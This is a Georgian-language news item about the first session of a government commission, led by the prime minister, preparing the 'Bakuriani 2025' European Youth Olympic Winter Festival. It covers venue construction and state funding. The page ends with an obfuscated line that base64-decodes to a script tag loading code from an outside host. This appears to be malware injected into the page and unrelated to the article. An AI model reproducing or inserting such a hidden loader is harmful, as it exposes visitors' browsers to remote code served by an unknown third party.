celsiusi
ავერსი საქკაბელი

საქართველოს პრემიერ-მინისტრ ირაკლი კობახიძის ხელმძღვანელობით, ევროპის ზამთრის ახალგაზრდული ოლიმპიური ფესტივალის, „ბაკურიანი 2025-ის“ ჩატარების ხელშეწყობის მიზნით შექმნილი სამთავრობო კომისიის პირველი სხდომა გაიმართა.

მთავრობის ადმინისტრაციის ინფორმაციით, კომისიის წევრებმა ოლიმპიადის ჩატარების უზრუნველსაყოფად საორგანიზაციო საკითხები განიხილეს.

"2025 წლის ევროპის ზამთრის ახალგაზრდული ოლიმპიური ფესტივალისთვის, რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდი ბაკურიანში ბიატლონისა და თხილამურებით რბოლის (Cross Country) მოედანს და 3.5 კმ სიგრძის ტრასას, ხოლო თბილისში ყინულის სასახლეს აშენებს.

ბაკურიანში ბიატლონის და თხილამურებით რბოლის ტრასების და მათთან დაკავშირებული ინფრასტრუქტურის მოწყობის სამუშაოები აქტიურად მიმდინარეობს. რბოლის ტრასების ხელოვნური გათოვლიანებისთვის ეწყობა წყალმომარაგებისა და ელექტროსისტემებიც. დასკვნით ეტაპზეა თბილისის ყინულის სასახლის მშენებლობა.

ჰოკეის, ფიგურული სრიალისა და კერლინგის სპორტის სახეობებისთვის განკუთვნილი თბილისის ყინულის სასახლე 700-მდე მაყურებელზეა გათვლილი.

პროექტები სახელმწიფო ბიუჯეტიდან 50 მილიონ ლარზე მეტით ფინანსდება.

ევროპის ზამთრის ახალგაზრდული ოლიმპიური ფესტივალის, „ბაკურიანი 2025-ის“ ჩატარების ხელშეწყობის მიზნით სამთავრობო კომისია მთავრობის განკარგულებით შეიქმნა. კომისია უზრუნველყოფს ფესტივალის ორგანიზებაში ჩართული უწყებების და ორგანიზაციების კოორდინაციას და ფესტივალთან დაკავშირებული საკითხების ოპერატიულ გადაწყვეტას.

ევროპის ზამთრის ახალგაზრდულ ოლიმპიურ ფესტივალს საქართველო 2025 წლის თებერვალში უმასპინძლებს", - ნათქვამია ინფორმაციაში.

 

106
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");